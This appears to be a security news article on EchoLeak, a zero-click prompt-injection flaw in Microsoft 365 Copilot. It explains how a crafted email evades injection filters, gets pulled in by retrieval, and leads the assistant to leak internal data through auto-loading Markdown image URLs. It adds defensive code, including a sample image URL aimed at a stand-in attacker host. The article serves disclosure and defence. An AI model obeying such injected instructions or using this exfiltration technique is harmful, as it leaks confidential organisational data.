Researchers have, for the first time, identified a zero-click vulnerability in an AI assistant, one capable of leaking confidential information from Microsoft 365 Copilot without any user interaction. The attack, dubbed EchoLeak, represents a new class of threats rooted in what are known as LLM (Large Language Model) scope violations.

The attack methodology was developed by researchers at Aim Labs in January 2025 and promptly reported to Microsoft. The vulnerability, now cataloged as CVE-2025-32711, was rated critical and was remediated server-side in May 2025, requiring no action from end users. Microsoft also stated that there are no known instances of the vulnerability being exploited in the wild.

Microsoft 365 Copilot is an AI assistant embedded across products such as Word, Excel, Outlook, and Teams. It utilizes OpenAI’s language models in conjunction with Microsoft Graph to generate text, analyze data, and respond to queries based on internal documents, communications, and other organizational data.

Although EchoLeak was mitigated before any known real-world exploitation, it spotlighted a fundamentally new category of security risk. An LLM scope violation arises when untrusted input causes a model to process and use data that lies beyond the intended user context, without any deliberate action from the user.



EchoLeak embodies this scenario. It begins with what appears to be a routine, business-formatted email. Embedded within is a carefully crafted prompt injection designed to target Copilot. The message easily evades detection by the built-in XPIA (Cross-Prompt Injection Attack) defense mechanism.

Later, when an employee queries Copilot on a related topic, the RAG (Retrieval-Augmented Generation) system identifies the email as contextually relevant and includes it in the model’s reference material. At this point, the injection is triggered within the LLM, prompting it to extract sensitive internal data and embed it in a link or image.
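The retrieval step described above can be illustrated with a toy example. This is only a sketch under stated assumptions: the keyword-overlap scoring, the `Document` type, and the `source` labels are hypothetical stand-ins, not how Copilot's RAG pipeline actually ranks content. The point it shows is that a retriever ranking purely on relevance will place an external email next to internal material in the model's context.

```python
from dataclasses import dataclass


@dataclass
class Document:
    source: str  # hypothetical provenance label, e.g. "external_email"
    text: str


def tokenize(text: str) -> set[str]:
    # Lowercase words with trailing punctuation removed.
    return {word.strip(".,:;!?").lower() for word in text.split()}


def retrieve(query: str, corpus: list[Document], k: int = 2) -> list[Document]:
    # Rank by naive keyword overlap; provenance plays no role in the score.
    query_terms = tokenize(query)
    ranked = sorted(
        corpus,
        key=lambda doc: len(query_terms & tokenize(doc.text)),
        reverse=True,
    )
    return ranked[:k]


corpus = [
    Document("internal_wiki", "Quarterly onboarding guide for new HR staff."),
    Document(
        "external_email",
        "Onboarding guide summary for the team. "
        "[attacker instructions would appear here]",
    ),
    Document("internal_wiki", "Cafeteria menu for the week."),
]

top = retrieve("Summarize the onboarding guide", corpus)
sources = [doc.source for doc in top]
```

In this toy corpus the external email scores highest for the employee's query, so its text, including whatever instructions it carries, reaches the model alongside trusted internal content.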

The danger is amplified by Copilot’s ability to generate Markdown-formatted image links. Images are loaded automatically when the response is rendered, so any sensitive data embedded in the image URL is silently exfiltrated. The browser sends these requests to an attacker-controlled server without requiring a single click or confirmation from the user.
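To make the exfiltration channel concrete, the following sketch scans a model response for inline Markdown images and reports which host each one would contact and which query parameters would travel with the request. The function name, the regular expression, and the `attacker.example` URL are illustrative assumptions; the pattern covers only inline `![alt](url)` images, not reference-style ones.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Matches inline Markdown images of the form ![alt](url); an assumption
# made for this sketch, not a complete Markdown parser.
INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\((\S+?)\)")


def image_requests(markdown: str) -> list[dict]:
    """List the host and query parameters of every auto-loading image."""
    findings = []
    for match in INLINE_IMAGE.finditer(markdown):
        parts = urlsplit(match.group(1))
        findings.append({"host": parts.hostname, "params": parse_qs(parts.query)})
    return findings


# Hypothetical model output with data smuggled into the image URL.
reply = (
    "Here is the summary. "
    "![status](https://attacker.example/pixel.png?d=Q3-forecast)"
)
found = image_requests(reply)
```

Here `found` contains a single entry for `attacker.example` with the parameter `d` set to `Q3-forecast`, which is exactly what a renderer would transmit when it fetches the image.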

While Microsoft blocks the majority of external domains, Copilot still implicitly trusts internal URLs, such as those from Teams or SharePoint. This trust can be exploited: URLs on these services that an attacker is able to abuse can serve as discreet vectors for data exfiltration.

Thus, even though EchoLeak has been patched, it remains a sobering sign of a new era of vulnerabilities tailored to AI-powered tools. As these technologies become more deeply embedded in enterprise workflows, the attack surface grows, while conventional security measures may struggle to keep pace.

To mitigate such risks, developers and administrators should strengthen prompt-level input filtering, restrict which data the LLM can see for a given request, and post-process model output to suppress external links and other structured output that can trigger automatic requests. RAG systems, in particular, should be configured to avoid ingesting external communications that may carry malicious injections.
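Two of these safeguards can be sketched in a few lines. This is a minimal illustration rather than a description of Microsoft's fix: the source labels, the allowlisted host `intranet.example`, and both function names are assumptions made for the example. The first function drops retrieved documents whose provenance is not trusted; the second replaces inline Markdown images that point at non-allowlisted hosts.

```python
import re
from urllib.parse import urlsplit

# Hypothetical policy values chosen for this sketch.
TRUSTED_SOURCES = {"internal_wiki", "internal_mail"}
ALLOWED_IMAGE_HOSTS = {"intranet.example"}

# Inline images only: ![alt](url). Reference-style images are not handled.
INLINE_IMAGE = re.compile(r"!\[([^\]]*)\]\((\S+?)\)")


def drop_untrusted_documents(docs: list[dict]) -> list[dict]:
    """Keep only retrieved documents whose source label is trusted."""
    return [doc for doc in docs if doc.get("source") in TRUSTED_SOURCES]


def strip_untrusted_images(markdown: str) -> str:
    """Replace images whose host is not on the allowlist with a text marker."""

    def replace(match: re.Match) -> str:
        host = urlsplit(match.group(2)).hostname
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        return f"[image removed: {match.group(1)}]"

    return INLINE_IMAGE.sub(replace, markdown)


docs = [
    {"source": "internal_wiki", "text": "Onboarding guide."},
    {"source": "external_email", "text": "Unsolicited message."},
]
kept = drop_untrusted_documents(docs)

cleaned = strip_untrusted_images(
    "ok ![x](https://attacker.example/p.png?d=1) "
    "![logo](https://intranet.example/logo.png)"
)
```

A host allowlist on its own is not sufficient, since trusted services can themselves be abused as relays, so a filter like this is best treated as one layer among several.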